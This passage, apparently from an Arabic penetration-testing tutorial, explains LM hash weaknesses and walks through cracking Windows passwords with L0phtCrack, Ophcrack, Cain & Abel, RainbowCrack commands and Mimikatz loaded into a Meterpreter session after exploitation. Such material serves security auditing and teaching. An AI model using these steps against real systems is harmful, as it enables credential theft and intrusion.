اﻟﻣرور .اﻟﻌﯾوب اﻷﻣﻧﯾﺔ اﻟﺗﻲ ھﻲ ﻣﺗﺄﺻﻠﺔ ﻓﻲ ﻧظﺎم اﻟﺗوﺛﯾﻖ ﻟﻛﻠﻣﺔ اﻟﺳر وﯾﻧدوز ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ ﺑﺳﮭوﻟﺔ ﻣﻊ ﻣﺳﺎﻋدة ﻣن .L0phtCrack
أﻧظﻣﺔ اﻟﺗﺷﻐﯾل وﯾﻧدوز ،اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ أﺳﺎس اﻟﺑروﺗوﻛول ،LAN Manager networking protocolsﺗﺳﺗﺧدم ﻧظﺎم اﻟﻣﺻﺎدﻗﺔ اﻟذي
ﯾﺗﻛون ﻣن 8ﺑﺎﯾت ﻣن اﻟﺗوﺛﯾﻖ ) (challengeواﻟﺗﻲ ﺗﻘوم ﺑﺈرﺟﺎع 24ﺑﺎﯾت ﻣن اﻻﺳﺗﺟﺎﺑﺔ ) (responseﻋﺑر اﻟﺷﺑﻛﺔ ﻣن اﻟﻌﻣﯾل إﻟﻰ اﻟﺧﺎدم
ﻓﻲ اﻟﺷﻛل .challenge/response formatﯾﻘوﻣﺎ اﻟﺧﺎدم ﺑﻣﻘﺎرﻧﺔ اﻻﺳﺗﺟﺎﺑﺔ )(responseﻣﻘﺎﺑل 24ﺑﺎﯾت ﻣن اﻻﺳﺗﺟﺎﺑﺔ اﻟﻣﺗوﻗﻌﺔ
) (responseاﻟﺧﺎﺻﺔ ﺑﮫ اﻟذي ﻗﺎﻣﺎ ھو ﺑﺣﺳﺎﺑﮭﺎ وﻧﺗﺎﺋﺞ اﻟﻣﻘﺎرﻧﺔ ھو اﻟﻣﺻﺎدﻗﺔ .ﺣﯾث ﺗﻘوم اﻟﺧوارزﻣﯾﺔ ﺑﺗﻘﺳﯾم ﻛﻠﻣﺔ اﻟﻣرور إﻟﻰ ﻗطﺎﻋﯾن
ﻣﻧﻔﺻﻠﯾن ﻣﻛون ﻣن ﺳﺑﻌﺔ أﺣرف ﺛم اﻟﻘﯾﺎم ﺑﺎﻟﮭﺎش ﻟﻛل ﻗطﺎع ﺑﺷﻛل ﻓردي .وھذا ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺗﻘﯾﯾد ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر إﻟﻰ ﺳﺑﻌﺔ أﺣرف،
وﯾﺟﻌل اﻟﻌﻣﻠﯾﺔ أﺳﮭل .ﺿﻌف ھﺎش ﻛﻠﻣﺔ اﻟﺳر ،إﻟﻰ ﺟﺎﻧب اﻧﺗﻘﺎل اﻟﮭﺎش ﻋﺑر اﻟﺷﺑﻛﺔ ﻓﻲ ﺷﻛل اﻟﺗوﺛﯾﻖ/اﻻﺳﺗﺟﺎﺑﺔ ،ﯾﺟﻌل اﻟﻧظم اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ
LMﻋرﺿﺔ ﻟﻼﻋﺗراض ﺗﻠﯾﮭﺎ ھﺟﻣﺎت dictionaryو brute-forceﺑواﺳطﺔ L0phtCrack 6. L0phtCrackﻟدﯾﮫ ﻗدره ﻣدﻣﺟﺔ
ﻋﻠﻰ اﺳﺗﯾراد ﻛﻠﻣﺎت اﻟﺳر ﻣن وﯾﻧدوز ﻋن ﺑﻌد ،ﺑﻣﺎ ﻓﻲ ذﻟك اﻹﺻدارات -64ﺑت ﻣن وﯾﻧدوز ﻓﯾﺳﺗﺎ ،وﯾﻧدوز ،7وآﻻت ﯾوﻧﻛس ،دون اﻟﺣﺎﺟﺔ
إﻟﻰ أداة ﺧﺎرﺟﯾﺔ.
ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻧﻘوم ﺑﺗﺛﺑﯾت ھذه اﻷداة ﺑﺎﺗﺑﺎع wizardاﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺛم اﻟﻧﻘر ﻓوق اﻷﯾﻘوﻧﺔ اﻟﻣﻌﺑرة ﻋﻧﮫ -
) (L0phtCrack6ﻓﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ.
ﻓﻲ L0phtCrack 6 Wizardﻧﻧﻘر ﻓوق Nextواﻟذي ﯾﻧﻘﻠﻧﺎ اﻟﻰ اﻟﺧطوة اﻟﺛﺎﻧﯾﺔ ﻛﻣﺎ ھو ﻣوﺿﺢ اﻣﻣﻧﺎ. -
ﻧﺟد اﻧﮫ ظﮭرت اﻣﻣﺎﻧﺎ ﻗﺎﺋﻣﮫ ﺑﮭﺎ اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات واﻟذي ﯾرﯾد ﻣﻧك ﺗوﺿﯾﺢ اﻟﻣﻛﺎن اﻟذي ﺳوف ﯾﺄﺧذ ﻣن ھﺎش ﻛﻠﻣﺎت اﻟﻣرور -
وھﻧﺎ ﺳوف ﻧﺧﺗﺎر Retrieve from the local machineﺛم ﻧﻧﻘر ﻓوق.
ﻧﻧﺗﻘل اﻻن اﻟﻰ اﻟﺧطوة اﻟﺛﺎﻟﺛﺔ ،واﻟﺗﻲ ﺗﺄﺗﻰ ھﻲ اﻷﺧرى ﺑﺎﻟﻌدﯾد ﻣن ﺧﯾﺎرات اﻟﺗدﻗﯾﻖ ) (auditing methodواﻟﺗﻲ ﺗرﯾد ﻣﻧك -
اﺧﺗﯾﺎر أي ﻣن ﻧظﺎم اﻟﺗدﻗﯾﻖ اﻟﺗﻲ ﺗرﯾد اﺳﺗﺧداﻣﮫ وھذا ﯾﻌﺗﻣد ﻋﻠﻰ ﻗوة اﻟﮭﺎش .ھﻧﺎ ﺳوف ﻧﺧﺗﺎر اﻗواھم وھو Strong Password
Auditﺛم ﻧﻧﻘر ﻓوق Nextﻟﻠﺗﻧﻘل اﻟﻰ اﻟﻣرﺣﻠﺔ اﻟراﺑﻌﺔ.
ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ذات اﻟﻌﻧوان Pick reporting Styleواﻟﺗﻲ ﻓﯾﮭﺎ ﺗﺣدﯾد ﻧوﻋﯾﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺳوف ﺗﻌرض ﻓﻲ اﻟﺗﻘرﯾر. -
اﻓﺗراﺿﯾﺎ ﯾوﺟد ﻋﻼﻣﺔ ﻋﻠﻰ اﻟﺟﻣﯾﻊ ﻣﺎ ﻋدا واﺣدا وھﯾﺎ ’ Display encrypted password ’hashﺣﯾث ﺳوف ﻧﺧﺗﺎرھﺎ ھﻲ
اﻷﺧرى ﺛم ﺑﻌد ذﻟك ﻧﻧﻘر ﻓوق nextﻟﻼﻧﺗﻘﺎل اﻟﻰ اﻟﻣرﺣﻠﺔ اﻟﺗﺎﻟﯾﺔ واﻷﺧﯾرة ﻣن ﻋﻣﻠﯾﺔ .wizard
ﻓﻲ اﻟﻣرﺣﻠﺔ اﻷﺧﯾرة ﯾﻘوم ﺑﻌرض ﺳرﯾﻊ ﻻﺧﺗﯾﺎرات ﻓﻲ ﺟﻣﯾﻊ اﻟﻣراﺣل اﻟﺳﺎﺑﻘﺔ وﯾﺧﺑرك اﻧﮫ ﻋﻠﻰ اﺳﺗﻌداد ﻟﻠﻘﯾﺎم ﺑﺎﻟﻌﻣﻠﯾﺔ. -
ﻧﻧﻘر ھﻧﺎ ﻓوق .FINISH -
ﺑﻌد اﻻﻧﺗﮭﺎء ﯾظﮭر ﻟك رﺳﺎﻟﺔ ﺗﺧﺑرك ﺑﺎﻧﮫ أﻧﮭﻲ اﻟﻌﻣﻠﯾﺔ ) (Audit completedﻧﻧﻘر ﻓوق .OK -
ﻓﻲ ﻗﺎﺋﻣﺔ اﻷدوات اﻟﻌﻠوﯾﺔ ﻧﻧﻘر ﻓوق اﻷداة .session options -
ﺑﻌد اﻟﻧﻘر ﻓوق Session Optionsﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ وﻧﺧﺗﺎر ﻣﻧﮭﺎ ﺗﻔﻌﯾل اﻻﺗﻲ: -
Crack NTLM Passwordsﻓﻲ اﻟﺟزء اﻟﻣﻧدرج ﺗﺣت ﻋﻧوان .Dictionary crack
Crack NTLM Passwordsﻓﻲ اﻟﺟزء اﻟﻣﻧدرج ﺗﺣت ﻋﻧوان .Dictionary/Brute Hybrid crack
Crack NTLM Passwordsﻓﻲ اﻟﺟزء اﻟﻣﻧدرج ﺗﺣت ﻋﻧوان .Brute force crack
Enable Brute Force Minimum Character Count
Enable Brute Force Maximum Character Count
ﺛم ﻧﻧﻘر ﻓوق .OK -
ﺑﺗﺣﻠﯾل اﻟﮭﺎش وإﻋطﺎﺋك ﺗﻘرﯾر ﺛم ﺑﻌد اﻟﻧﻘر ﻓوق OKﻧرﺟﻊ اﻟﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ وﻧﻧﻘر ﻓﻘوق اﻟﻌﻼﻣﺔ BEGINﻟﯾﺑدأ -
ﻋن ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور.
Ophcrack
اﻟﻣﺻدرhttp://ophcrack.sourceforge.net :
Ophcrackھو أداة ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر وﯾﻧدوز وﯾﺳﺗﺧدم ﺟداول rainbow tablesﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر .ﻷﻧﮫ ﯾﺄﺗﻲ ﻣﻊ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم
اﻟرﺳوﻣﯾﺔ وﯾﻌﻣل ﻋﻠﻰ أﻧظﻣﺔ ﺗﺷﻐﯾل ﻣﺧﺗﻠﻔﺔ ﻣﺛل وﯾﻧدوز ،ﻟﯾﻧوﻛس /ﯾوﻧﯾﻛس ،اﻟﺦ.
ﯾوﻓر ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻧﺳﺧﺔ ﺳطر اﻷواﻣر CLIوﻧﺳﺧﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ GUIﻣن ﺗطﺑﯾﻖ .Ophcrack
اﻟﻣﻣﯾزات:
-ﻛﺳر ھﺎﺷﺎت ﻣن اﻟﻧوع LMو.NTLM
-ﯾﺳﺗﺧدم Brute-force moduleﻟﻛﺳر اﻟﻛﻠﻣﺎت اﻟﺑﺳﯾطﺔ
-ﯾﺳﺗﺧدم رﺳوم ﺑﯾﺎﻧﯾﺔ ﻟﺗﺣﻠﯾل ﻛﻠﻣﺎت اﻟﺳر.
-ﺗﻔرﯾﻎ وﺗﺣﻣﯾل اﻟﮭش ﻣن اﻟﻣﻠف SAMﻣن ﻗﺳم اﻟوﯾﻧدوز.
oﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻧﻘوم ﺑﺗﺛﺑﯾت ھذه اﻷداة ﺑﺎﺗﺑﺎع wizardاﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺛم اﻟﻧﻘر ﻓوق اﻷﯾﻘوﻧﺔ اﻟﻣﻌﺑرة ﻋﻧﮫ
) (Ophcrackﻓﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ او ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن رﯾﻖ اﺗﺑﺎع اﻟﻣﺳﺎر اﻟﺗﺎﻟﻲ ﻓﺗؤدى اﻟﻰ ظﮭور ﺷﺎﺷﮫ
ﻣﺛﯾﻠﮫ ﻟﺷﺎﺷﮫ اﻟﺗﺎﻟﯾﺔ.
Password Attacks | Offline Attacks | Ophcrack
oﻧﻼﺣظ ﻣن ﺷرﯾط اﻷدوات اﻟﻌﻠوي وﺟود اﻟزر loadﺑﻌض اﻟﻧﻘر ﻋﻠﯾﮫ ﺗظﮭر ﻗﺎﺋﻣﮫ ﺗﺣدد اﻟﻣﻛﺎن اﻟذي ﺳوف ﯾﺄﺧذ ﻣن اﻟﺗطﺑﯾﻖ ﺑﯾﺎﻧﺎت
.SAMﻧﺟد ﻣن ھذه اﻟﺧﯾﺎرات PWDUMP fileوھذا ﺳوف ﯾﺄﺧذ ﻣن ﻧﺎﺗﺞ إﺧراج اﻷداة pwdumpاﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮫ ﺳﺎﺑﻘﺎ.
oﻓﻲ ﺷرﯾط اﻷدوات اﻟﻌﻠوي ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق Tablesواﻟﺗﻲ ﯾؤدى اﻟﻰ ظﮭور اﻟﻘﺎﺋﻣﺔ اﻟﺗﺎﻟﯾﺔ.
oﺣﯾث ﻣن ﺧﻼل ھذه اﻟﻘﺎﺋﻣﺔ ﯾﻣﻛن ﺗﺣﻣﯾل Rainbow tableﺛم ﺑﻌد ﺗﺣﻣﯾﻠﮫ ﻧرﺟﻊ اﻟﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ وﻧﻧﻘر ﻓوق اﻟزر Crack
ﻟﯾﺑدأ ﻋﻣﻠﯾﺔ ﻛﺳر اﻟﮭﺎش وﺗﺣﻠﯾل ﻛﻠﻣﺎت اﻟﻣرور.
Cain & Abelھﻲ أداة ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر .ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻣﺎﯾﻛروﺳوﻓت .ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﻻﺳﺗﻌﺎدة أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ﻛﻠﻣﺎت
اﻟﺳر ﻣن ﺧﻼل اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﺷﺑﻛﺔ ) ،(sniffing networkوﻛﺳﯾر ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة ﺑﺎﺳﺗﺧدام ھﺟﻣﺎت اﻟﻘﺎﻣوس،brute-force ،
ھﺟﻣﺎت ﺗﺣﻠﯾل اﻟﺷﻔرات ،ﺗﺳﺟﯾل ﻣﺣﺎدﺛﺎت ، VolPﻓك ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧﻠوطﺔ ) ،(decoding scrambled passwordsواﺳﺗﻌﺎدة ﻣﻔﺎﺗﯾﺢ
اﻟﺷﺑﻛﺔ ﻻﺳﻠﻛﯾﺔ ،revealing password boxes ،ﻛﺷف ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧزﻧﺔ ﻣؤﻗﺗﺎ ،وﺗﺣﻠﯾل ﺑروﺗوﻛوﻻت اﻟراوﺗر .ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذه
اﻷداة ،ﻓﺎن ﻛﻠﻣﺎت اﻟﺳر وﺑﯾﺎﻧﺎت اﻻﻋﺗﻣﺎد ﻣن ﻣﺻﺎدر ﻣﺧﺗﻠﻔﺔ ﯾﻣﻛن اﺳﺗردادھﺎ ﺑﺳﮭوﻟﺔ.
ھذه اﻷداة ﺗﺗﻛون ﻣن (Arp Poison Routing) APRاﻟﺗﻲ ﺗﻣﻛﻧك ﻣن اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ وھﺟﻣﺎت رﺟل ﻓﻲ اﻟﻣﻧﺗﺻف.
Sniffingﻓﻲ ھذه اﻷداة ھﻲ أﯾﺿﺎ ﻗﺎدرة ﻋﻠﻰ ﺗﺣﻠﯾل اﻟﺑروﺗوﻛوﻻت اﻟﻣﺷﻔرة ﻣﺛل HTTPو ،SSH-1وﯾﺣﺗوي ﻋﻠﻰ ﻣرﺷﺣﺎت ﻻﻟﺗﻘﺎط
credentialsﻣن ﻣﺟﻣوﻋﺔ واﺳﻌﺔ ﻣن آﻟﯾﺎت اﻟﺗوﺛﯾﻖ.
Rainbowcrack
اﻟﻣﺻدرhttp://www.project-rainbowcrack.com :
RainbowCrackھو ﺗطﺑﯾﻖ ﯾﺳﺗﺧدم ﻟﻛﺳر اﻟﮭﺎش ﻋن طرﯾﻖ اﺳﺗﺧدام ﺟداول .Rainbow tableﺣﯾث إﻧﮫ ﯾﺳﺗﺧدم ﺧوارزﻣﯾﺔ
time-memory tradeoffﻟﻛﺳر اﻟﮭﺎش .ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ ذﻟك ﻓﺎﻧﮫ ﯾﺳﺗﺧدم brute force crackerﻟﻛﺳر اﻟﮭﺎش واﻟﺗﻲ ﺗﺧﺗﻠف ﻋﻧد
ﻣﻘﺎرﻧﺗﮫ ﻣﻊ .time-memory tradeoff hash crackerﺣﯾث أن brute force crackerﻟﻛﺳر اﻟﮭﺎش ﺳوف ﺗﺣﺎول اﺳﺗﺧدام ﻛل
plaintextsﻣﻣﻛﻧﺔ واﺣدا ﺗﻠو اﻵﺧر ﺧﻼل ﻋﻣﻠﯾﺔ اﻟﻛﺳر ،ﻓﻲ ﺣﯾن ان RainbowCrackﯾﺣﺳب ﺟﻣﯾﻊ أزواج plaintext-ciphertext
اﻟﻣﻣﻛﻧﺔ ﻓﻲ وﻗت ﻣﺑﻛر وﺗﺧزﯾﻧﮭﺎ ﻓﻲ اﻟﻣﻠف .rainbow tableﻗد ﯾﺳﺗﻐرق وﻗﺗﺎ طوﯾﻼ ﻗﺑل ﺣﺳﺎب اﻟﺟداول ،وﻟﻛن ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﻣرﺣﻠﺔ
اﻟﺣﺳﺎب ،ﺳوف ﺗﻛون ﻗﺎدرة ﻋﻠﻰ ﻛﺳر اﻟﺷﻔرات اﻟﻧص اﻟﻣﺷﻔر ﻓﻲ ﺟداول Rainbow tableﺑﺳﮭوﻟﺔ وﺑﺳرﻋﺔ.
ﻣﻠﺣوظﮫ :ھذه اﻷداة ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ وﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﺧﻼل ﻛﺗﺎﺑﺔ اﻟﺳطر ] [rcrack *.rt -f crackmeﻓﻲ اﻟﺗرﻣﻧﺎل.
ﺣﯾث ﯾﻣﺛل ] Rainbow table [*.rtوﯾﻣﺛل اﻟﻣﻠف crackmeاﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﮭﺎش .ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﯾﻣﻛن اﯾﺿﺎ
اﺳﺗﺧدام rainbow crackأﯾﺿﺎ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻟﺳر ] [rcracki_mt -h hash rainbow_table_pathnameواﻟﺗﻲ ﺗﻌد ﻧﺳﺧﮫ
ﻣﺣدﺛﮫ ﻣن اﻟﺳﺎﺑﻘﺔ.
#rcracki_mt -h hash rainbow_table_pathname
#rcracki_mt -l hash_list_file rainbow_table_pathname
#rcracki_mt -f pwdump_file rainbow_table_pathname
#rcracki_mt -c lst_file rainbow_table_pathname
أﯾﺿﺎ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﯾوﺟد ﺑﻌض اﻷدوات اﻷﺧرى اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ اﺳﺗﺧدام rainbow tableواﻟﻣوﺟودة ﻓﻲ اﻟﻣﺳﺎر
./usr/share/rainbowcrack/
ﻣﺛل rtgnاﻟذي ﯾﺳﺗﺧدم ﻹﻧﺷﺎء rainbow table
Rcrackاﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮭﺎ ﺳﺎﺑﻘﺎ وﺑﻌض اﻷدوات اﻷﺧرى اﻟﺧﺎﺻﺔ ﺑﺎﻟﻌﻣل ﻋﻠﻰ .rainbow table
ﻣﻘﺪﻣﮫ
ﻓﻲ ھذا اﻟﺟزء ﺳوف ﻧﺗﻧﺎول اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﻋن ﺑﻌد ﻓﻲ ﻧص ﻋﺎدي .أﻧﺎ ﻟن أدﻋﻲ أﻧﻧﻲ أﻓﮭم ﺑﺎﻟﺿﺑط ﻛﯾف ﯾﻔﻌل ﻣﺎ ﯾﻔﻌﻠﮫ ،وﻟﻛن ﻣﺑرﻣﺟﻲ
ھذا اﻟﺗطﺑﯾﻖ ﻗد وﺟدوا ان ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻧص ﻋﺎدى ﻏﯾر ﻣﺷﻔر ﻓﻲ ﻋدة ﻣواﻗﻊ ﻣن اﻟﻌﻣﻠﯾﺎت اﻟﻘﺎﺋﻣﺔ
ﻋﻠﻰ اﻟوﯾﻧدوز ) .(windows processﻟﻘد أﺻﺑﺢ Mimikatzﺑرﻧﺎﻣﺞ ﻣﺳﺗﻘل اﻵن ﯾﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ،وﺗﻣت إﺿﺎﻓﺔ اﻟﻰ
إطﺎر Metasploitﺑوﺻﻔﮭﺎ وﺣدة ،Meterpreterﻣﻣﺎ ﯾﺟﻌل اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﺳﮭﻠﮫ ﺑﻣﺟرد أن ﯾﻛون ﻟدﯾك ﺟﻠﺳﺔ ﻋﻣل ﺑﻌﯾدة.
Mimikatzھو أداة post-exploitationﻋظﯾﻣﮫ اﻟﺗﻲ ﻛﺗﺑﮭﺎ ﺑﻧﯾﺎﻣﯾن دﯾﻠﺑﻲ ) .(Benjamin Delpyھﻧﺎك اﻟﻛﺛﯾر ﻣن اﻷوﻗﺎت ﺑﻌد ﻗﯾﺎم
اﻟﻣﮭﺎﺟﻣﯾن ﺑﻣرﺣﻠﺔ exploitationأوﻟﯾﺔ ﻧﺎﺟﺣﺔ وﻟﻛﻧﮭم ﻗد ﯾرﻏﺑوا ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ ﻣوطﺊ ﻗدم أﻛﺛر ﺛﺑﺎﺗﺎ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر/اﻟﺷﺑﻛﺔ .وﻏﺎﻟﺑﺎ ﻣﺎ
ﯾﺗطﻠب ذﻟك ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻟﺗﻛﻣﯾﻠﯾﺔ Mimikatz .ھﻲ ﻣﺣﺎوﻟﺔ ﻟرﺑطﮭﺎ ﻣﻊ ﺑﻌض اﻟﻣﮭﺎم اﻷﻛﺛر ﻓﺎﺋدة واﻟﺗﻲ ﺳوف ﯾرﻏب اﻟﻣﮭﺎﺟﻣﯾن
ﻓﻲ اﻟﻘﯾﺎم ﺑﮭﺎ.
ھذه اﻷداة ﺗم اﻧﺷﺎﺋﮭﺎ ﻋﺎم 2007ﻟﺗﺗﻔﺎﻋل ﻣﻊ ﻣﻛوﻧﺎت أﻣن وﯾﻧدوز؛ ﻹﺛﺑﺎت ﺑﻌض ﻣﻔﺎھﯾم اﻷﻣن؛ ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﺗﺑﻊ ﺗطور .Microsoft
Mimikatzھﻲ أداة ﻓﻲ اﻷﺳﺎس ﺗم ﺻﻧﻌﮭﺎ ﻟﺗﻌﻠم Cوزﯾﺎدة اﻟﻛﺛﯾر ﻣن اﻟﺗﺟﺎرب ﻣﻊ أﻣﺎن . Windowsوﺗﺳﺗﺧدم اﻵن اﻟﻣﻌروف ﺟﯾدا
ﻻﺳﺗﺧراج ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ ھﯾﺋﺔ ﻏﯾر ﻣﺷﻔره ،plaintextsاﻟﮭﺎش ،رﻣز PINوﺗذاﻛر Kerberosﻣن اﻟذاﻛرة Mimikatz .ﯾﻣﻛﻧﮭﺎ ان
ﺗؤدى أﯾﺿﺎ pass-the-ticket ،pass-the-hashأو ,build Golden ticketsﺗﺗﻼﻋب ﻣﻊ certificateأو اﻟﻣﻔﺎﺗﯾﺢ اﻟﺧﺎﺻﺔ
) ... ، vault ،(private keyرﺑﻣﺎ ﺗﺻﻧﻊ اﻟﻘﮭوة؟
ﻟﺣﺳن اﻟﺣظ ،ﻗررت Metasploitإﺿﺎﻓﺔ Mimikatzﻛﺑرﻧﺎﻣﺞ ﻧﺻﻲ meterpreterﻟﻠﺳﻣﺎح ﻟﻠوﺻول إﻟﻰ ﻣﺟﻣوﻋﺔ ﻛﺎﻣﻠﺔ ﻣن اﻟﻣﯾزات
ﻣن دون اﻟﺣﺎﺟﺔ إﻟﻰ ﺗﺣﻣﯾل أي ﻣن اﻟﻣﻠﻔﺎت إﻟﻰ اﻟﻘرص اﻟﻣﺿﯾف اﻟﮭدف.
ﻣﻼﺣظﺔ :إﺻدار Mimikatzﻓﻲ metasploitھو ،v1.0وﻣﻊ ذﻟك أﺻدر ﺑﻧﯾﺎﻣﯾن دﯾﻠﺑﻲ ﺑﺎﻟﻔﻌل v2.0ﻛﺣزﻣﺔ واﺣدة ﻗﺎﺋﻣﺔ ﺑذاﺗﮭﺎ
ﻋﻠﻰ ﻣوﻗﻌﮫ ﻋﻠﻰ اﻻﻧﺗرﻧت .ﺣﯾث ان اﻟﻛﺛﯾر ﻣن ﺟﻣل اﻟﺑﻧﺎء ﻗد ﺗﻐﯾرت ﻣﻊ اﻟﺗرﻗﯾﺔ إﻟﻰ .v2.0وﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن ﺧﻼل اﻟﻣواﻗﻊ
اﻟﺗﺎﻟﻲ ﺳواء ﻟﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز او ﻟﯾﻧﻛس
http://blog.gentilkiwi.com/mimikatz or directly
https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20140505
ﺗم إﺿﺎﻓﺔ اﻻﺻدار اﻟﺛﺎﻧﻲ ﻟل meterpreterﻣن ﻗﺑل rapid7ﻟذﻟك ﺳوف ﺗﺣﺗﺎج اﻟﻰ ﺗﺣدﯾث metasploitاو ﯾﻣﻛن ﺗﺣﻣﯾل اﻹﺻدار
اﻟﺛﺎﻧﻲ اﻟﻣﺧﺻص ﻟل metasploitﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ:
https://github.com/rapid7/meterpreter/tree/master/source/extensions/kiwi
https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/kiwi
Loading Mimikatz
ﺑﻌد exploitﻧﺎﺟﺢ واﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ meterpreterﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﻠﺗﺄﻛد ﻣن أن اﻟﺟﻠﺳﺔ )(sessionاﻟﺗﻲ ﻧﻌﻣل ﺑﮭﺎ ﺗﻌﻣل ﻣﻊ اﻣﺗﯾﺎزات
ﻣﺳﺗوى اﻟﻧظﺎم ) (System privilegeﻟﻛﻲ ﺗﻌﻣل Mimikatzﺑﺷﻛل ﺻﺣﯾﺢ.
اﻣﺎ إذا ﻛﻧت ﻻ ﺗﻌﻣل ﺑﺎﻣﺗﯾﺎزات systemﻓﯾﻣﻛن اﻟﺗﻧﻘل اﻟﻰ اﻣﺗﯾﺎزات systemﻋن طرﯾﻖ اﺻدار اﻻﻣر getsystemﻛﺎﻻﺗﻰ:
Mimikatzﯾدﻋم اﺑﻧﯾﺔ اﻟوﯾﻧدوز bit32و .bit64ﺑﻌد اﻟﺗرﻗﯾﺔ اﻟﻰ اﻣﺗﯾﺎزات SYSTEMﻟﻧظﺎم ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﻟﺗﺣﻘﻖ ﻣن ﺑﻧﯾﺔ اﻟﻧظﺎم،
ﻣﻊ اﻻﻣر " ."sysinfoإذا ﻛﺎﻧت ﺑﻧﯾﺔ اﻟﺟﺎھز bit64ﺛم ﻗﻣت ﺑﺗﺣﻣﯾل Mimikatzذات اﻟﺑﻧﯾﺔ bit32ﻓﮭذا ﻗد ﯾؤﺛر ﺳﻠﺑﺎ واﻟﺗﻲ ﺳوف ﺗﺳﺑب
ﺗوﻗف ﻣﻌظم اﻟﻣﯾزات ﻟﺗﻛون ﻏﯾر ﻓﻌﺎﻟﮫ.
ﯾﺗﺑﯾن ﻣن ھذا ان ﺑﯾﻧﺔ اﻟﻧظﺎم ھﻲ bit32ﻟذﻟك ﺳوف ﻧﻘوم ﺑﺗﺣﻣﯾل Mimikatzاﻟﺧﺎص ﺑﮭذه اﻟﺑﯾﻧﺔ ﺑﺎﺳﺗﺧدام اﻻﻣر .load mimikatzاﻣﺎ
إذا ﻛﺎﻧت اﻟﺑﻧﯾﮫ bit64ﻓﻧﺳﺗﺧدم اﻻﻣر .load mimikatz.64وﯾﻣﻛن ﻋرض اﻷواﻣر اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻌﮫ ﻋن طرﯾﻖ .help
